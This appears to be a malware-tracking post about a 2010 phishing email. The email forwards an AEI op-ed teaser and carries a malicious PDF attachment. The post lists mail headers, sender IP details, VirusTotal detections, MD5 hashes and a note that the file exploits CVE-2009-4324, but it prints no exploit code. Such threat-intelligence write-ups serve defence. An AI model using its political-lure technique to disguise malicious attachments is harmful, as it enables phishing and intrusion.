Subject: Fw: AEI : President Obama's Detrimental Deadlines

----- Forwarded Message ----
From: accounts-noreply@aei.org accounts-noreply@aei.org
To: XXXXXXXXXXXX
Sent: Tue,July 13, 2010 10:35:55 AM
Subject: AEI.org : President Obama's Detrimental Deadlines

President Obama's Detrimental Deadlines
By Marc A. Thiessen | Washington Post
Tuesday, June 29, 2010
Rather than setting artificial deadlines, President Obama must start projecting resolve to win the war in Afghanistan, and he must tell Americans the stakes, the consequences of failure, and why he will not accept defeat.   [Read more]

The American Enterprise Institute for Public Policy Research
1150 Seventeenth Street, N.W.
Washington, D.C. 20036
www.aei.org
Phone: 202.862.5800


Headers
Received: (qmail 6387 invoked from network); 14 Jul 2010 13:26:37 -0000
Received: from static-76-9-100-66.ngn.onecommunications.net (HELO XXXXXX) (76.9.100.66)
[...]
From: XXXXXXXXXXXXXXXXXXXXXXXXXXX
To: XXXXXXXXXXX
Subject: =?iso-8859-1?B?Rnc6IEFFSSA6IFByZXNpZGVudCBPYmFtYSdzIERldHJpbWVudGFsIERlYWRsaW5lcw==?=
Date: Wed, 14 Jul 2010 09:41:52 -0400
X-Priority: 3
X-Mailer: Extreme Mail Express
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=NextMime00A_000_90245093D"
Hostname:    static-76-9-100-66.ngn.onecommunications.net
ISP:    One Communications Corporation
Organization:    GAWRYL AND MACALLISTER ATTORNEYS AT LAW
Type:    Corporate
Assignment:    Static IP
Country:    United States us flag
State/Region:    New Hampshire
City:    Keene

File President_Obama_s_Detrimental_Dea received on 2010.07.28 03:41:23 (UTC)
http://www.virustotal.com/analisis/6b5a5f8b09ef4a6571f5431008c3ad80441205c9cba2c565ad8a21ea0421d7e4-1280288483
Result: 18/42 (42.86%)
AhnLab-V3    2010.07.28.00    2010.07.27    Win-Trojan/Exploit-PDF
AntiVir    8.2.4.26    2010.07.27    EXP/Pidief.244965
Authentium    5.2.0.5    2010.07.28    PDF/Pidief.BO
Avast    4.8.1351.0    2010.07.28    JS:Pdfka-gen
Avast5    5.0.332.0    2010.07.28    JS:Pdfka-gen
BitDefender    7.2    2010.07.28    Exploit.PDF-JS.Gen
CAT-QuickHeal    11.00    2010.07.27    Exploit.PDF.FlateDecode
DrWeb    5.0.2.03300    2010.07.28    Exploit.PDF.687
Emsisoft    5.0.0.34    2010.07.28    Exploit.JS.Pdfka!IK
eSafe    7.0.17.0    2010.07.27    Exploit.PDF.f
F-Prot    4.6.1.107    2010.07.28    PDF/Pidief.BO
F-Secure    9.0.15370.0    2010.07.28    Exploit.PDF-JS.Gen
GData    21    2010.07.28    Exploit.PDF-JS.Gen
Ikarus    T3.1.1.84.0    2010.07.28    Exploit.JS.Pdfka
McAfee-GW-Edition    2010.1    2010.07.27    Heuristic.BehavesLike.JS.BufferOverflow.A
Norman    6.05.11    2010.07.27    JS/Shellcode.HQ
nProtect    2010-07-28.01    2010.07.28    Exploit.PDF-JS.Gen
Sophos    4.55.0    2010.07.28    Troj/PDFJs-GQ
Additional information
File size: 106155 bytes
MD5...: 51d54fce1d57a7228a4ed8d193f9f2bf


 President_Obama_s_Detrimental_Dea received on 2010.07.15 11:59:20 (UTC)
Result: 19/42
http://www.virustotal.com/analisis/34cb88a51729a7d54d6e575ae14e184b25ee581ee15bc60775251909d63bd477-1279195160

Antivirus     Version     Last Update     Result
a-squared     5.0.0.31     2010.07.15     Exploit.JS.Pdfka!IK
AhnLab-V3     2010.07.15.01     2010.07.15     Win-Trojan/Exploit-PDF
AntiVir     8.2.4.10     2010.07.15     EXP/Pidief.244965
Authentium     5.2.0.5     2010.07.15     PDF/Pidief.BO
Avast     4.8.1351.0     2010.07.14     JS:Pdfka-gen
Avast5     5.0.332.0     2010.07.15     JS:Pdfka-gen
BitDefender     7.2     2010.07.15     Exploit.PDF-JS.Gen
CAT-QuickHeal     11.00     2010.07.15     Exploit.PDF.FlateDecode
DrWeb     5.0.2.03300     2010.07.15     Exploit.PDF.687
eSafe     7.0.17.0     2010.07.15     Exploit.PDF.f
F-Prot     4.6.1.107     2010.07.15     PDF/Pidief.BO
F-Secure     9.0.15370.0     2010.07.15     Exploit.PDF-JS.Gen
GData     21     2010.07.15     Exploit.PDF-JS.Gen
Ikarus     T3.1.1.84.0     2010.07.15     Exploit.JS.Pdfka
McAfee     5.400.0.1158     2010.07.15     Exploit-PDF.q.gen!stream
McAfee-GW-Edition     2010.1     2010.07.15     Heuristic.BehavesLike.JS.BufferOverflow.A
Norman     6.05.11     2010.07.14     JS/Shellcode.HQ
nProtect     2010-07-15.02     2010.07.15     Exploit.PDF-JS.Gen
Sophos     4.55.0     2010.07.15     Troj/PDFJs-GQ
Additional information
File size: 155575 bytes
MD5   : 0f5d42aa99b17eabddc19a46013b517b

Vicheck.ca
PDF Exploit call to media.newPlayer CVE-2009-4324
https://www.vicheck.ca/md5query.php?hash=51d54fce1d57a7228a4ed8d193f9f2bf

PDF Exploit call to media.newPlayer CVE-2009-4324
https://www.vicheck.ca/md5query.php?hash=0f5d42aa99b17eabddc19a46013b517b